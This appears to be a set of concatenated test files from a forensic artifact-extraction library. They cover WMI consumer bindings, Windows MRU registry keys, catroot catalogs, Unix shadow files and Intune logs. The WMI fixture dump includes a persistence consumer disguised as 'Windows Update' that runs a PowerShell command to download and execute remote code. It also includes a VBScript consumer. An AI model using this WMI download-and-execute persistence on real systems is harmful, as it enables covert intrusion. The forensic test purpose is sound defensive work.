__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer="\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"bad vbs\"",Filter="\\\\.\\root\\subscription:__EventFilter.Name=\"Windows Update Event MOF\""
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : DESKTOP-O8964S4
__NAMESPACE             : ROOT\Subscription
__PATH                  : \\DESKTOP-O8964S4\ROOT\Subscription:__FilterToConsumerBinding.Consumer="\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"bad vbs\"",Filter="\\\\.\\root\\subscription:__EventFilter.Name=\"Windows Update Event MOF\""
Consumer                : \\.\root\subscription:ActiveScriptEventConsumer.Name="bad vbs"
CreatorSID              : {1, 5, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             :
Filter                  : \\.\root\subscription:__EventFilter.Name="Windows Update Event MOF"
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : DESKTOP-O8964S4
```

## __EventFilter

```
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
__GENUS          : 2
__CLASS          : __EventFilter
__SUPERCLASS     : __IndicationRelated
__DYNASTY        : __SystemClass
__RELPATH        : __EventFilter.Name="Windows Update Event MOF"
__PROPERTY_COUNT : 6
__DERIVATION     : {__IndicationRelated, __SystemClass}
__SERVER         : DESKTOP-O8964S4
__NAMESPACE      : ROOT\Subscription
__PATH           : \\DESKTOP-O8964S4\ROOT\Subscription:__EventFilter.Name="Windows Update Event MOF"
CreatorSID       : {1, 5, 0, 0...}
EventAccess      :
EventNamespace   : root\cimv2
Name             : Windows Update Event MOF
Query            : SELECT * FROM __InstanceCreationEvent WITHIN 5WHERE TargetInstance ISA "Win32_Process" AND TargetInstance.Name = "test.exe"
QueryLanguage    : WQL
PSComputerName   : DESKTOP-O8964S4

__GENUS          : 2
__CLASS          : __EventFilter
__SUPERCLASS     : __IndicationRelated
__DYNASTY        : __SystemClass
__RELPATH        : __EventFilter.Name="SCM Event Log Filter"
__PROPERTY_COUNT : 6
__DERIVATION     : {__IndicationRelated, __SystemClass}
__SERVER         : DESKTOP-O8964S4
__NAMESPACE      : ROOT\Subscription
__PATH           : \\DESKTOP-O8964S4\ROOT\Subscription:__EventFilter.Name="SCM Event Log Filter"
CreatorSID       : {1, 2, 0, 0...}
EventAccess      :
EventNamespace   : root\cimv2
Name             : SCM Event Log Filter
Query            : select * from MSFT_SCMEventLogEvent
QueryLanguage    : WQL
PSComputerName   : DESKTOP-O8964S4

__GENUS          : 2
__CLASS          : __EventFilter
__SUPERCLASS     : __IndicationRelated
__DYNASTY        : __SystemClass
__RELPATH        : __EventFilter.Name="Windows\" Update Event MOF"
__PROPERTY_COUNT : 6
__DERIVATION     : {__IndicationRelated, __SystemClass}
__SERVER         : DESKTOP-O8964S4
__NAMESPACE      : ROOT\Subscription
__PATH           : \\DESKTOP-O8964S4\ROOT\Subscription:__EventFilter.Name="Windows\" Update Event MOF"
CreatorSID       : {1, 5, 0, 0...}
EventAccess      :
EventNamespace   : root\cimv2
Name             : Windows" Update Event MOF
Query            : SELECT * FROM __InstanceCreationEvent WITHIN 5WHERE TargetInstance ISA "Win32_Process" AND TargetInstance.Name = "test.exe"
QueryLanguage    : WQL
PSComputerName   : DESKTOP-O8964S4
```

## EventConsumer
```
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
__GENUS          : 2
__CLASS          : ActiveScriptEventConsumer
__SUPERCLASS     : __EventConsumer
__DYNASTY        : __SystemClass
__RELPATH        : ActiveScriptEventConsumer.Name="bad vbs"
__PROPERTY_COUNT : 8
__DERIVATION     : {__EventConsumer, __IndicationRelated, __SystemClass}
__SERVER         : DESKTOP-O8964S4
__NAMESPACE      : ROOT\Subscription
__PATH           : \\DESKTOP-O8964S4\ROOT\Subscription:ActiveScriptEventConsumer.Name="bad vbs"
CreatorSID       : {1, 5, 0, 0...}
KillTimeout      : 0
MachineName      :
MaximumQueueSize :
Name             : bad vbs
ScriptFilename   :
ScriptingEngine  : VBScript
ScriptText       : Dim oLocation, oServices, oProcessList, oProcess

                                    Set oLocation = CreateObject("WbemScripting.SWbemLocator")
                        Set oServices = oLocation.ConnectServer(, "root\cimv2")
                        Set oProcessList = oServices.ExecQuery("SELECT * FROM Win32_Process WHERE ProcessID = " & TargetEvent.ProcessID)
                        For Each oProcess in oProcessList
                                oProcess.Terminate()
                        Next
PSComputerName   : DESKTOP-O8964S4

__GENUS               : 2
__CLASS               : CommandLineEventConsumer
__SUPERCLASS          : __EventConsumer
__DYNASTY             : __SystemClass
__RELPATH             : CommandLineEventConsumer.Name="Windows Update Consumer MOF"
__PROPERTY_COUNT      : 27
__DERIVATION          : {__EventConsumer, __IndicationRelated, __SystemClass}
__SERVER              : DESKTOP-O8964S4
__NAMESPACE           : ROOT\Subscription
__PATH                : \\DESKTOP-O8964S4\ROOT\Subscription:CommandLineEventConsumer.Name="Windows Update Consumer MOF"
CommandLineTemplate   : cmd /C powershell.exe -nop iex(New-Object Net.WebClient).DownloadString('http://10.0.0.104/bad.exe'); bad.exe
CreateNewConsole      : False
CreateNewProcessGroup : False
CreateSeparateWowVdm  : False
CreateSharedWowVdm    : False
CreatorSID            : {1, 5, 0, 0...}
DesktopName           :
ExecutablePath        :
FillAttribute         :
ForceOffFeedback      : False
ForceOnFeedback       : False
KillTimeout           : 0
MachineName           :
MaximumQueueSize      :
Name                  : Windows Update Consumer MOF
Priority              : 32
RunInteractively      : False
ShowWindowCommand     :
UseDefaultErrorMode   : False
WindowTitle           :
WorkingDirectory      :
XCoordinate           :
XNumCharacters        :
XSize                 :
YCoordinate           :
YNumCharacters        :
YSize                 :
PSComputerName        : DESKTOP-O8964S4

__GENUS                  : 2
__CLASS                  : NTEventLogEventConsumer
__SUPERCLASS             : __EventConsumer
__DYNASTY                : __SystemClass
__RELPATH                : NTEventLogEventConsumer.Name="SCM Event Log Consumer"
__PROPERTY_COUNT         : 13
__DERIVATION             : {__EventConsumer, __IndicationRelated, __SystemClass}
__SERVER                 : DESKTOP-O8964S4
__NAMESPACE              : ROOT\Subscription
__PATH                   : \\DESKTOP-O8964S4\ROOT\Subscription:NTEventLogEventConsumer.Name="SCM Event Log Consumer"
Category                 : 0
CreatorSID               : {1, 2, 0, 0...}
EventID                  : 0
EventType                : 1
InsertionStringTemplates : {}
MachineName              :
MaximumQueueSize         :
Name                     : SCM Event Log Consumer
NameOfRawDataProperty    :
NameOfUserSIDProperty    : sid
NumberOfInsertionStrings : 0
SourceName               : Service Control Manager
UNCServerName            :
PSComputerName           : DESKTOP-O8964S4
```
"""  # noqa: E501


def test_consumerbindings_all_namespaces(target_win: Target, fs_win: VirtualFilesystem) -> None:
    """Test the CIM plugin for extracting WMI Consumer Bindings from all namespaces."""
    wbem_repository = absolute_path("_data/plugins/os/windows/cim/non-default-namespace")
    fs_win.map_dir("Windows/System32/wbem/repository", wbem_repository)
    target_win.add_plugin(cim.CimPlugin)
    consumer_records = list(target_win.cim.consumerbindings())
    binding_names = [r.filter_name for r in consumer_records]
    assert "Pentestlab-WMI" in binding_names



from __future__ import annotations

from typing import TYPE_CHECKING

import pytest

from dissect.target.helpers.regutil import VirtualHive, VirtualKey, VirtualValue
from dissect.target.target import Target

if TYPE_CHECKING:
    from dissect.target.target import Target


@pytest.fixture
def target_win_mru(target_win_users: Target) -> Target:
    user_details = target_win_users.user_details.find(sid="S-1-5-21-3263113198-3007035898-945866154-1002")

    user_hive = VirtualHive()
    user_hive.filepath = user_details.home_path.joinpath("ntuser.dat")

    # RunMRU
    run_key = VirtualKey(user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU")
    run_key.add_value("MRUList", VirtualValue(user_hive, "MRUList", "ba"))
    run_key.add_value("a", VirtualValue(user_hive, "a", "cmd\\1"))
    run_key.add_value("b", VirtualValue(user_hive, "b", "\\\\mfs\\1"))

    # RecentDocs
    recentdocs_key = VirtualKey(user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs")
    recentdocs_key.add_value("MRUListEx", VirtualValue(user_hive, "MRUListEx", b"\x00\x00\x00\x00\xff\xff\xff\xff"))
    recentdocs_value = bytes.fromhex(
        "55006e007400690074006c0065006400"
        "20002d0020004e006f00740065007000"
        "610064002e0070006400660000008000"
        "320000000000000000000000556e7469"
        "746c6564202d204e6f74657061642e6c"
        "6e6b00005a0008000400efbe00000000"
        "000000002a0000000000000000000000"
        "00000000000000000000000000005500"
        "6e007400690074006c00650064002000"
        "2d0020004e006f007400650070006100"
        "64002e006c006e006b00000026000000"
    )
    recentdocs_key.add_value("0", VirtualValue(user_hive, "0", recentdocs_value))

    # OpenSaveMRU
    opensave_key = VirtualKey(
        user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU"
    )
    opensave_key.add_value("MRUList", VirtualValue(user_hive, "MRUList", "ba"))
    opensave_key.add_value("a", VirtualValue(user_hive, "a", "C:\\path\\to\\a"))
    opensave_key.add_value("b", VirtualValue(user_hive, "b", "C:\\path\\to\\b"))

    opensave_sub_key = VirtualKey(user_hive, opensave_key.path + "\\sub")
    opensave_sub_key.add_value("MRUList", VirtualValue(user_hive, "MRUList", "ba"))
    opensave_sub_key.add_value("a", VirtualValue(user_hive, "a", "C:\\path\\to\\sub\\a"))
    opensave_sub_key.add_value("b", VirtualValue(user_hive, "b", "C:\\path\\to\\sub\\b"))
    opensave_key.add_subkey("*", opensave_sub_key)

    # OpenSavePidlMRU
    opensave_pidl_key = VirtualKey(
        user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSavePidlMRU"
    )
    opensave_pidl_subkey = VirtualKey(user_hive, opensave_pidl_key.path + "\\*")
    opensave_pidl_subkey.add_value(
        "MRUListEx",
        VirtualValue(
            user_hive,
            "MRUListEx",
            b"\x08\x00\x00\x00\t\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x12\x00\x00\x00\x11\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x0e\x00\x00\x00\r\x00\x00\x00\x0c\x00\x00\x00\x0b\x00\x00\x00\n\x00\x00\x00\xff\xff\xff\xff",
        ),
    )
    opensave_pidl_subkey.add_value(
        "0",
        VirtualValue(
            user_hive,
            "0",
            b"\x14\x00\x1fP\xe0O\xd0 \xea:i\x10\xa2\xd8\x08\x00+00\x9d\x19\x00/Z:\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x002\x00\xef\x1d\x01\x00dR|j \x00W9R717~O.ZIP\x00\x00T\x00\t\x00\x04\x00\xef\xbedR|jdR|j.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\x00e\x00b\x00 \x00O\x00p\x00t\x00i\x00m\x00i\x00z\x00e\x00r\x00.\x00z\x00i\x00p\x00\x00\x00\x1c\x00\x00\x00",  # noqa: E501
        ),
    )
    opensave_pidl_key.add_subkey("*", opensave_pidl_subkey)

    # LastVisitedMRU
    lastvisited_key = VirtualKey(
        user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\LastVisitedMRU"
    )
    lastvisited_key.add_value("MRUList", VirtualValue(user_hive, "MRUList", "ba"))
    value_a = b"\x00\x00".join([x.encode("utf-16-le") for x in ["test_a.exe", "c:\\path\\to\\something\\a", ""]])
    value_b = b"\x00\x00".join([x.encode("utf-16-le") for x in ["test_b.exe", "c:\\path\\to\\something\\b", ""]])
    lastvisited_key.add_value("a", VirtualValue(user_hive, "a", value_a))
    lastvisited_key.add_value("b", VirtualValue(user_hive, "b", value_b))

    # LastVisitedPidlMRU
    lastvisited_pidl_key = VirtualKey(
        user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\LastVisitedPidlMRU"
    )
    lastvisited_pidl_key.add_value(
        "MRUListEx",
        VirtualValue(
            user_hive,
            "MRUListEx",
            b"\x05\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff",
        ),
    )
    lastvisited_pidl_key.add_value(
        "1",
        VirtualValue(
            user_hive,
            "1",
            b"K\x00e\x00e\x00P\x00a\x00s\x00s\x00.\x00e\x00x\x00e\x00\x00\x00\x14\x00\x1fP\xe0O\xd0 \xea:i\x10\xa2\xd8\x08\x00+00\x9d\x14\x00.\x80\x92+\x16\xd3e\x93zF\x95k\x92p:\xca\x08\xaf\x00\x00",  # noqa: E501
        ),
    )

    # ACMru
    acmru_key = VirtualKey(user_hive, "Software\\Microsoft\\Search Assistant\\ACMru\\5603")
    acmru_key.add_value("000", VirtualValue(user_hive, "000", "value"))
    acmru_key.add_value("001", VirtualValue(user_hive, "001", "value"))
    # ACMru wordwheel query
    wordwheel_key = VirtualKey(user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WordWheelQuery")
    wordwheel_key.add_value("MRUListEx", VirtualValue(user_hive, "MRUListEx", b"\x00\x00\x00\x00\xff\xff\xff\xff"))
    wordwheel_key.add_value("0", VirtualValue(user_hive, "0", b"h\x00e\x00l\x00l\x00o\x00\x00\x00"))

    # Map Network Drive MRU
    networkdrive_key = VirtualKey(
        user_hive, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Map Network Drive MRU"
    )
    networkdrive_key.add_value("MRUList", VirtualValue(user_hive, "MRUList", "ba"))
    networkdrive_key.add_value("a", VirtualValue(user_hive, "a", "\\\\path\\to\\a"))
    networkdrive_key.add_value("b", VirtualValue(user_hive, "b", "\\\\path\\to\\b"))

    # Terminal Server Client MRU
    mstsc_key = VirtualKey(user_hive, "Software\\Microsoft\\Terminal Server Client\\Default")
    mstsc_key.add_value("MRU0", VirtualValue(user_hive, "MRU0", "10.0.0.10"))
    mstsc_key.add_value("MRU1", VirtualValue(user_hive, "MRU1", "10.0.0.11"))
    mstsc_key.add_value("MRU10", VirtualValue(user_hive, "MRU10", "10.0.0.100"))

    # Office MRU
    office_value = "[F00000000][T01D72F6E719BE870][O00000000]*C:\\path"
    excel_15_file_key = VirtualKey(user_hive, "Software\\Microsoft\\Office\\15.0\\Excel\\File MRU")
    excel_15_file_key.add_value("Item 1", VirtualValue(user_hive, "Item 1", office_value))
    excel_15_file_key.add_value("Item 2", VirtualValue(user_hive, "Item 2", office_value))
    excel_16_place_key = VirtualKey(user_hive, "Software\\Microsoft\\Office\\16.0\\Excel\\Place MRU")
    excel_16_place_key.add_value("Item 1", VirtualValue(user_hive, "Item 1", office_value))
    excel_16_place_key.add_value("Item 2", VirtualValue(user_hive, "Item 2", office_value))

    user_hash = "ADAL_6D9010B2B7A1483B256AE7477738DBA7C530BD9BA53DB1D6691441E74B83608A"
    excel_16_user_file_key = VirtualKey(
        user_hive, "Software\\Microsoft\\Office\\16.0\\Excel\\User MRU\\" + user_hash + "\\File MRU"
    )
    excel_16_user_file_key.add_value("Item 1", VirtualValue(user_hive, "Item 1", office_value))
    excel_16_user_file_key.add_value("Item 2", VirtualValue(user_hive, "Item 2", office_value))

    for key in [
        run_key,
        recentdocs_key,
        opensave_key,
        opensave_pidl_key,
        lastvisited_key,
        lastvisited_pidl_key,
        acmru_key,
        wordwheel_key,
        networkdrive_key,
        mstsc_key,
        excel_15_file_key,
        excel_16_place_key,
        excel_16_user_file_key,
    ]:
        user_hive.map_key(key.path, key)

    target_win_users.registry.add_hive(
        "HKEY_USERS",
        f"HKEY_USERS\\{user_details.user.sid}",
        user_hive,
        user_hive.filepath,
    )
    target_win_users.registry._hives_to_users[user_hive] = user_details
    return target_win_users


def test_mru_plugin(target_win_mru: Target) -> None:
    run = list(target_win_mru.mru.run())
    recentdocs = list(target_win_mru.mru.recentdocs())
    opensave = list(target_win_mru.mru.opensave())
    lastvisited = list(target_win_mru.mru.lastvisited())
    acmru = list(target_win_mru.mru.acmru())
    networkdrive = list(target_win_mru.mru.networkdrive())
    mstsc = list(target_win_mru.mru.mstsc())
    msoffice = list(target_win_mru.mru.msoffice())

    assert len(run) == 2
    assert len(recentdocs) == 1
    assert len(opensave) == 5
    # test if opensave_pidl_key is correctly resolved
    assert opensave[4].value == "My Computer\\Z:\\Web Optimizer.zip"
    assert len(lastvisited) == 3
    # test if lastvisited_pidl_key is correctly resolved
    assert lastvisited[2].filename == "KeePass.exe"
    assert lastvisited[2].path == "My Computer\\{d3162b92-9365-467a-956b-92703aca08af}\\"
    assert len(acmru) == 3
    assert len(networkdrive) == 2
    assert len(mstsc) == 3
    assert len(msoffice) == 6

    assert len(list(target_win_mru.mru())) == 25



from __future__ import annotations

from typing import TYPE_CHECKING

import pytest
from flow.record.fieldtypes import digest

from dissect.target.plugins.os.windows.catroot import CatrootPlugin
from tests._utils import absolute_path

if TYPE_CHECKING:
    from dissect.target.filesystem import VirtualFilesystem
    from dissect.target.target import Target


@pytest.mark.parametrize(
    ("filename", "hashes", "file_hints", "len_results"),
    [
        pytest.param(
            "catroot_package_name.cat",
            [
                "18d4711ffaf619d81c76b9a2375888316cbce6cfde6298b7e2d7165028281cde",
                "9333e6100ea011d73bd6d927237d93c284424042d8e339e7bec58e958cf1b18a",
                "d6bffeb5833fc17ddc441459f4a90f866a270d10b2261f1775f303ea1e600ede",
            ],
            ["Microsoft-Windows-PhotoBasic-WOW64-merged-Package"],
            3,
            id="PackageName",
        ),
        pytest.param(
            "catroot_package_name_2.cat",
            [
                "9504d1e72c0276088ba53d493b869d9dd1da253852823b4f44ea05d2c59e488e",
            ],
            ["Microsoft-Windows-Printing-PrintToPDFServices-Package"],
            1,
            id="PackageName2",
        ),
        pytest.param(
            "catroot_file_hint.cat",
            [
                "0469496b538e68ae97b6dc856a16e272830d8b0f8c978254e19226f5a2cdb71e",
                "0a3b6d06699313dc2b4fb2ae1e677c416408ade6a1ca022395b3cd92764ddd5d",
                "1a4ced5ac0b485f859584743042ff6eef68329b95ae8979b192e9ed46dc4a5cc",
                "32e8250fba4d4d24692cca4fa91dfd6659ab811ff37fd071f7875c6178888ba7",
                "35b07ee2cf53351917b966283fedebb58ccae21df358223301ba77577c186136",
            ],
            [
                "msil_multipoint-wms.coll..lecontrol.resources_31bf3856ad364e35_10.0.19041.1_en-us_be33ff08e678d0dc\\Wms.CollapsibleControl.Resources.dll",
                "msil_multipoint-wmsmanager.resources_31bf3856ad364e35_10.0.19041.1_en-us_b4f3be8d3d296eb4\\WmsManager.Resources.dll",
                "msil_multipoint-wms.alertsview.resources_31bf3856ad364e35_10.0.19041.1_en-us_7a57dedfa22c1a6d\\Wms.AlertsView.Resources.dll",
                "msil_multipoint-wmsadminuilibrary.resources_31bf3856ad364e35_10.0.19041.1_en-us_47cfbfac3d8bbe69\\WmsAdminUILibrary.Resources.dll",
                "msil_multipoint-wms.dash..addintabs.resources_31bf3856ad364e35_10.0.19041.1_en-us_f6c7cebefb0b4d85\\Wms.Dashboard.AddinTabs.Resources.dll",
                "msil_multipoint-wmswssgcommon.resources_31bf3856ad364e35_10.0.19041.1_en-us_b7261118c0f1fbfe\\WmsWssgCommon.Resources.dll",
                "msil_multipoint-wms.skuresources.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc4901fade485b61\\Wms.SkuResources.Resources.dll",
                "msil_multipoint-wmsusertab.resources_31bf3856ad364e35_10.0.19041.1_en-us_a64149851e198a87\\WmsUserTab.Resources.dll",
                "msil_multipoint-wmssystemtab.resources_31bf3856ad364e35_10.0.19041.1_en-us_38e614cdb422ddf1\\WmsSystemTab.Resources.dll",
                "msil_multipoint-wms.mmstools.resources_31bf3856ad364e35_10.0.19041.1_en-us_94ce42426fe482ef\\Wms.MMSTools.Resources.dll",
                "msil_multipoint-wmsstatustab.resources_31bf3856ad364e35_10.0.19041.1_en-us_8c4e51c6a0a9be12\\WmsStatusTab.Resources.dll",
                "msil_multipoint-wmsdashboard.resources_31bf3856ad364e35_10.0.19041.1_en-us_f7e7f4de797fc24f\\WmsDashboard.Resources.dll",
                "msil_multipoint-wms.admincommon.resources_31bf3856ad364e35_10.0.19041.1_en-us_7c8a2d4f818abac3\\Wms.AdminCommon.Resources.dll",
                "msil_multipoint-wms.dashboard.forms.resources_31bf3856ad364e35_10.0.19041.1_en-us_3f56c777fba2ec12\\Wms.Dashboard.Forms.Resources.dll",
                "msil_multipoint-wms.dashboardcommon.resources_31bf3856ad364e35_10.0.19041.1_en-us_3c11dbfdda22a912\\Wms.DashboardCommon.Resources.dll",
            ],
            34,
            id="FileHint",
        ),
    ],
)
def test_catroot_files(
    target_win: Target,
    fs_win: VirtualFilesystem,
    filename: str,
    hashes: list[str],
    file_hints: list[str],
    len_results: int,
) -> None:
    catroot_file = absolute_path(f"_data/plugins/os/windows/catroot/{filename}")
    file_location = f"\\Windows\\system32\\catroot\\test\\{filename}"
    fs_win.map_file(
        file_location,
        catroot_file,
    )

    target_win.add_plugin(CatrootPlugin)

    records = list(target_win.catroot.files())

    assert len(records) == len_results

    sorted_file_hints = sorted(file_hints)
    # Make sure the order is constant by sorting on digest
    for cat_hash, record in zip(sorted(hashes), sorted(records, key=lambda r: r.digest.sha256), strict=False):
        assert str(record.source) == "c:" + file_location
        assert record.catroot_name == filename
        assert sorted(record.hints) == sorted_file_hints
        assert record.digest.sha256 == cat_hash


def test_catroot_catdb(target_win: Target, fs_win: VirtualFilesystem) -> None:
    catroot_file = absolute_path("_data/plugins/os/windows/catroot/catdb")
    fs_win.map_file("windows/system32/catroot2/{ID}/catdb", catroot_file)

    target_win.add_plugin(CatrootPlugin)

    records = list(target_win.catroot.catdb())

    hashes = [
        digest({"sha256": "083b9b717253f48ac314e6aa92b88fa775d194420a55f1b3e291ceffbff2377a"}),
        digest({"sha1": "fe71c1d4efa330b807ce00dc0b5055f8ab95eb02"}),
    ]

    assert len(records) == 2

    # Make sure the order is constant by sorting on digest
    for expected_digest, record in zip(
        sorted(hashes, key=lambda d: d.sha1 or d.sha256),
        sorted(records, key=lambda r: r.digest.sha1 or r.digest.sha256),
        strict=False,
    ):
        assert record.catroot_name == "Containers-ApplicationGuard-Package~31bf3856ad364e35~amd64~~10.0.19041.1288.cat"
        assert record.source == "c:\\windows\\system32\\catroot2\\{ID}\\catdb"
        assert record.hints == []
        # No direct comparison available, but representation comparison suffices.
        assert str(expected_digest) == str(record.digest)



from __future__ import annotations

from datetime import datetime, timezone
from io import BytesIO
from textwrap import dedent
from typing import TYPE_CHECKING

from dissect.target.plugins.os.unix.shadow import ShadowPlugin
from tests._utils import absolute_path

if TYPE_CHECKING:
    import pytest

    from dissect.target.filesystem import VirtualFilesystem
    from dissect.target.target import Target


def test_unix_shadow(target_unix_users: Target, fs_unix: VirtualFilesystem) -> None:
    shadow_file = absolute_path("_data/plugins/os/unix/shadow/shadow")
    fs_unix.map_file("/etc/shadow", shadow_file)
    target_unix_users.add_plugin(ShadowPlugin)

    results = list(target_unix_users.passwords())
    assert len(results) == 1
    assert results[0].name == "test"
    assert (
        results[0].crypt
        == "$6$oLHns1qc.C3DoQ8c$temOg6X.UF5Ly3gM03cGnBLib30mv8J49dUI.w9.EHTnO4R467zyKbfBnmTa5IIvDr5mRXFoJVBGKF6QuFDpo1"
    )
    assert results[0].salt == "oLHns1qc.C3DoQ8c"
    assert results[0].hash == "temOg6X.UF5Ly3gM03cGnBLib30mv8J49dUI.w9.EHTnO4R467zyKbfBnmTa5IIvDr5mRXFoJVBGKF6QuFDpo1"
    assert results[0].algorithm == "sha512"
    assert results[0].crypt_param is None
    assert results[0].last_change == datetime(2021, 12, 2, 0, 0, 0, tzinfo=timezone.utc)  # 18963
    assert results[0].min_age is None
    assert results[0].max_age == datetime(2295, 9, 16, 0, 0, 0, tzinfo=timezone.utc)  # 99999
    assert results[0].warning_period == 7
    assert results[0].inactivity_period is None
    assert results[0].expiration_date is None
    assert results[0].unused_field == ""


def test_unix_shadow_backup_file(target_unix_users: Target, fs_unix: VirtualFilesystem) -> None:
    """Test if both the shadow file and shadow backup file are read and returns unique hash+user combinations."""
    shadow_file = absolute_path("_data/plugins/os/unix/shadow/shadow")
    fs_unix.map_file("/etc/shadow", shadow_file)

    first_entry = shadow_file.read_bytes()
    other_entry = first_entry.replace(b"test", b"other-user")
    duplicate_entry = first_entry
    fs_unix.map_file_fh("/etc/shadow-", BytesIO(first_entry + other_entry + duplicate_entry))

    results = list(target_unix_users.passwords())
    assert len(results) == 2
    assert results[0].name == "test"
    assert results[1].name == "other-user"
    assert results[0].hash == results[1].hash


def test_unix_shadow_invalid_shent(
    caplog: pytest.LogCaptureFixture, target_unix_users: Target, fs_unix: VirtualFilesystem
) -> None:
    """Test if we can parse invalid day values in shents."""

    shadow_invalid = """
    no_last_change:$6$salt$hash1::0:99999:7::123456:
    no_max_age:$6$salt$hash2:18963:0::7:::
    only_last_change:$6$salt$hash3:18963::::::
    no_int_fields:$6$salt$hash4:string::::::
    daemon:*:18474:0:99999:7:::
    bin:*:18474:0:99999:7:::
    nobody:*:18474:0:99999:7:::
    regular:$6$salt$hash5:1337:0:99999:7::123456:
    """
    fs_unix.map_file_fh("/etc/shadow", BytesIO(dedent(shadow_invalid).encode()))

    results = list(target_unix_users.passwords())
    assert len(results) == 5

    assert [r.name for r in results] == [
        "no_last_change",
        "no_max_age",
        "only_last_change",
        "no_int_fields",
        "regular",
    ]

    assert results[0].name == "no_last_change"
    assert results[0].last_change is None
    assert results[0].min_age is None
    assert results[0].max_age is None
    assert results[0].warning_period == 7
    assert results[0].inactivity_period is None
    assert results[0].expiration_date == datetime(2308, 1, 6, tzinfo=timezone.utc)

    assert results[1].name == "no_max_age"
    assert results[1].last_change == datetime(2021, 12, 2, tzinfo=timezone.utc)
    assert results[1].max_age is None

    assert results[2].name == "only_last_change"
    assert results[2].last_change == datetime(2021, 12, 2, tzinfo=timezone.utc)

    assert results[3].name == "no_int_fields"
    assert results[3].last_change is None
    assert (
        "Unable to parse last_change shadow value in /etc/shadow: invalid literal for int() with base 10: 'string' ('string')"  # noqa:E501
        in caplog.text
    )

    # make sure we parsed the last entry even though the other entries are 'broken'
    assert results[-1].name == "regular"
    assert results[-1].salt == "salt"
    assert results[-1].hash == "hash5"
    assert results[-1].algorithm == "sha512"
    assert results[-1].last_change == datetime(1973, 8, 30, tzinfo=timezone.utc)
    assert results[-1].min_age is None
    assert results[-1].max_age == datetime(2247, 6, 14, tzinfo=timezone.utc)
    assert results[-1].warning_period == 7
    assert results[-1].inactivity_period is None
    assert results[-1].expiration_date == datetime(2308, 1, 6, tzinfo=timezone.utc)



from __future__ import annotations

from typing import TYPE_CHECKING

import pytest

from dissect.target.exceptions import UnsupportedPluginError
from dissect.target.plugins.os.windows.log.agentexecutor import AgentExecutorLogPlugin
from tests._utils import absolute_path

if TYPE_CHECKING:
    from dissect.target.filesystem import VirtualFilesystem
    from dissect.target.target import Target


LOG_PATH = "ProgramData/Microsoft/IntuneManagementExtension/Logs/AgentExecutor.log"


def test_agentexecutor_check_compatible_missing_file(target_win: Target) -> None:
    """Plugin should raise if the AgentExecutor log is missing."""
    with pytest.raises(UnsupportedPluginError):
        target_win.add_plugin(AgentExecutorLogPlugin)


def test_agentexecutor_check_compatible_success(target_win: Target, fs_win: VirtualFilesystem) -> None:
    """Plugin should load when the AgentExecutor log exists."""
    fs_win.map_file(
        LOG_PATH,
        absolute_path("_data/plugins/os/windows/log/agentexecutor/agentexecutor.log"),
    )

    target_win.add_plugin(AgentExecutorLogPlugin)


def test_agentexecutor_parsing_valid_entries(target_win: Target, fs_win: VirtualFilesystem) -> None:
    """Should parse valid AgentExecutor log entries."""
    fs_win.map_file(
        LOG_PATH,
        absolute_path("_data/plugins/os/windows/log/agentexecutor/agentexecutor.log"),
    )

    target_win.add_plugin(AgentExecutorLogPlugin)
    records = list(target_win.agentexecutor())

    assert len(records) == 2

    first, second = records

    assert type(first).__name__ == "windows_intune_agentexecutor_log"
    assert first.component == "AgentExecutor"
    assert first.thread == "1"
    assert first.type == "1"
    assert first.context == ""
    assert "DNS detection failed with multi-line" in first.message
    assert first.file_origin == "AgentExecutor.log"

    assert type(second).__name__ == "windows_intune_agentexecutor_log"
    assert second.component == "AgentExecutorService"
    assert second.thread == "2"
    assert second.type == "2"
    assert second.context == "CTX"
    assert "Another entry, testing DD-MM-YYYY format" in second.message
    assert second.file_origin == "ExplicitLogFile.log"
